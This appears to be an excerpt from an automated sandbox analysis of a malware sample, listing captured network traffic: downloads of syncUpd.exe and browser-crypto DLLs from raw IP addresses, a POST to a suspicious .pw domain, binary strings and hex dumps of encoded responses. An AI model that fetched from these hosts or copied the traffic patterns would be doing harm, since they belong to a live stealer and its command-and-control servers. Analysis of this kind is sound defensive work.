Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.35Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/sqlite3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/freebl3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/mozglue.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/msvcp140.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/nss3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/softokn3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/vcruntime140.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: bitbucket.org

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chincenterblandwka.pw

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Dec 2023 17:13:59 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 38 0d 0a 04 00 00 00 2d 20 5c 6c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8- \l0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 35 63 0d 0a 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 10 d8 fb df 5e bc 1a e5 bb 26 38 d3 93 5f fe d0 3a d7 a3 3b 4b eb 12 ad 01 7f 9a 0e d5 ba 37 b5 fe f5 6b bb 81 36 99 91 32 fd 7d e0 79 b2 04 06 98 2e c4 b2 9d 5b db 68 8f 6e 9d cf 80 f7 8e d0 77 81 b5 90 9e 2f 80 c9 73 0d a8 ea 0d 0a 30 0d 0a 0d 0a Data Ascii: 5cH>99$J^&8_:;K7k62}y.[hnw/s0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 61 0d 0a 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c5 12 e1 5c a9 f8 70 7d 87 d5 44 be c4 32 8a a5 31 5b f4 55 a6 1e 2d 0d 0a 30 0d 0a 0d 0a Data Ascii: 2aH>99$JY\p}D21[U-0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 9e cd ad 49 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 28 3c ff 91 dd e4 d3 c2 7a 4d 8a a4 75 b4 f3 cf 5f 21 6f 40 51 f8 43 ab 4c cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 11 54 09 11 89 d2 af 2b e4 02 3d 97 24 41 7f fe a1 99 26 7d c6 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 4f 55 af ca 71 83 e8 b9 5f 45 28 18 ad 48 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff ff 78 97 af a6 7b b2 4d 82 fd 92 2b cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 b0 90 c0 e8 b1 55 84 3a a6 8d 43 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 8c 70 e1 47 e4 fc 03 53 e2 37 df 87 b4 71 dc 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 41 63 c2 75 6e fd 29 2a e7 d0 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 68 ad 60 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 96 0f 2d 6e 04 93 02 8d e4 24 bf 70 7e 3e 3f 43 1e 99 cb cc 9a f1 a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 1a 1b 70 30 3f d6 6a 72 f3 79 9b 1d 50 40 0e 20 2c 36 fc 7a 5c 0a 74 df 70 af 6d 2d c6 e3 51 d2 cd b3 5f 2f 87 ee b7 0f 9a 2e 51 79 60 9d ba 11 05 cc 5a d8 2c bd 4d 6d 2d 39 71 a6 78 48 e6 e6 35 05 63 f0 9f 3f 01 47 46 dd 52 47 a1 ca fa 41 f8 bc 46 27 d5 f4 df 70 1a 7d 06 e5 44 5f 14 f2 2d 7b 5e 08 0b dd 07 f9 09 d9 37 36 2b c4 c2 3c 51 1d e5 91 2b bc b6 9d 62 3e aa a7 79 3d 46 dc e9 c8 40 22 cf 5d f3 72 92 a6 91 a4 8f 42 ac 74 27 2c ee 50 f6 af a7 68 08 43 0d f9 be 2c ce c2 6c 6a 69 75 4d d7 03 e2 79 cb 43 b1 fc 11 17 68 35 d2 2d 0f f1 95 ba 94 14 ad 6e c1 bc cd 7c 79 6a da 0d 54 ff e7 dc 49 8c ff 3e cf 06 ec 23 cc f8 bf 40 bb 39 fe e2 ef a6 64 76 a1 2a 63 fa 2d 55 76 e9 b5 c5 55 ab 32 f8 24 34 a1 eb b5 e0 f7 a1 b9 c2 76 73 1e 40 28 2b aa 0a ee b9 30 21 bb 67 14 7b 5c 1e ed 69 db 63 02 21 5b d6 2f 9a f8 b9 77 6c 69 66 4b 83 2b ea e1 46 a8 5a 12 23 13 34 db 94 c8 4a 0c 4b e6 21 e2 22 f9 f0 16 ee 27 62 e8 a6 da 91 03 e9 a2 a3 a4 6a ba 49 62 3f b1 b1 96 fa d5 5d 18 67 0d b7 ee 7c f6 aa e7 28 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 62 37 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0d e1 6b 24 20 85 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 25 3c ff e5 84 e4 d3 18 7b 4d 8a a4 75 b4 a3 83 06 21 6f 40 51 f8 43 6b 14 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 67 97 24 47 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f cb d0 63 1a f8 bc 40 de dc fb 5d 56 9f 19 f6 ca 71 83 e8 b9 5f a5 70 18 93 83 95 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 22 97 af a6 7b b2 16 ce a4 92 2b cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 80 dc 99 e8 b1 55 84 3a a6 f9 1a 89 4f 27 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ac 0c ac 6f 30 79 fe 76 7d e1 47 e4 3c 5b 53 e2 23 df 87 b4 03 85 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c 79 d3 19 09 04 07 25 fd 99 04 b9 3f 94 63 81 3b c2 75 a6 fc 29 2a 89 89 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 5b 82 36 53 65 d3 bf 08 48 f4 cc 76 de 0c 51 2e 02 b8 5d 68 3b 0e fa 50 b9 4a 5d 17 74 f9 ce 9e d2 be be 2c 6e 20 43 02 cf e7 24 bd 70 73 3e 3f 45 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 09 2b 75 30 50 d6 6a 72 f2 79 9b 0c 68 1b 0e 20 2c 44 fd 7a 5c 7a 07 d0 70 af 67 57 ec f4 d1 d3 cd b3 5b 17 9a ee b7 0f 64 23 51 79 48 8d ba 11 0f e4 4b d8 2c b7 6d 63 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 c1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 ab 83 b0 ff 2a b3 09 e1 5f 13 27 2c b1 fb 9e 1a 14 f1 c9 e9 c1 0c f1 1b a8 05 23 3c ff 45 d5 e4 d3 c4 7a 4d 8a a4 75 b4 1d 3d 57 21 6f 60 51 f8 43 ab 45 cb 12 84 4f da 06 d9 b5 40 33 1c 73 50 71 9d 0d 97 2d a0 f8 5c 17 54 09 11 89 d2 af 2b e4 42 34 97 24 43 7f fe b3 ae 2f 7d c5 74 97 19 3c 4b c5 4c 11 86 84 3c 18 51 62 0c 6b 86 35 f0 b8 5e 7f 1f 88 d1 67 1a 47 ba ad bd dc fb 5d 56 ef a7 a7 ca da 83 eb b8 54 44 28 18 ef f2 90 8d 8b 03 de cc 76 61 e6 96 ce e0 61 ed 41 d3 4a 2c ff 0f 75 97 a3 a6 3b b2 1c 60 f5 92 37 cd ad 86 7d 68 90 77 1f b9 2d 53 6c c2 52 67 3a 85 75 20 6a d8 05 46 f2 fc 3e 7e 88 02 f4 b6 7e 90 41 40 c6 74 50 e5 bf ff 87 b0 6d 45 94 46 2b b2 59 3e 35 26 1f 18 d2 2b fd 11 df 00 0b bd 33 f6 3e 06 ef 9b f2 1d 66 7c 1b 4c 9b 93 8c e9 71 6c d3 08 44 42 c8 e8 b1 75 84 3a a6 59 4b 89 4f 23 25 db db 1c 4c 13 b7 f6 51 cc cb e3 f4 75 bd 93 f1 ba 18 df 68 cd 1b 51 79 fe ce 72 e1 47 e4 fc 0a 53 e2 33 df 87 b4 a7 d4 86 c2 26 44 c7 77 18 24 6c 52 c2 4e 14 c6 39 4c b9 fd bb 7e 76 fc 24 fd 99 78 70 3e 94 63 61 6a c2 75 6c fd 29 2a 3d d8 10 64 b9 90 fc d7 21 ce fd d6 16 1b 50 7b fa ad 1b ac f3 32 09 bc cc 08 48 f8 74 72 de 0c 95 7d 02 b8 5f 68 3b 0e 84 03 b9 4a 5d 17 74 d9 ce 9e b2 90 cc 48 0f 14 22 02 8d d9 07 bd 70 73 ee 3b 45 92 3c c9 cc bb 61 a5 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 bf 82 20 c6 84 b6 a6 f2 84 9c 77 30 56 2a e1 d7 e3 0b 2b d2 e4 26 1a 0c a4 69 88 89 09 2b 75 30 50 d6 6a 72 f2 79 9b 0c 28 1b 0e e0 02 36 8e 08 3f 7a 07 d0 e8 a3 65 57 ec e4 96 d3 cd bd 59 17 9a 1a b3 0f 64 23 51 79 48 8d ba 11 0f e4 4b d8 6c b7 6d 23 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
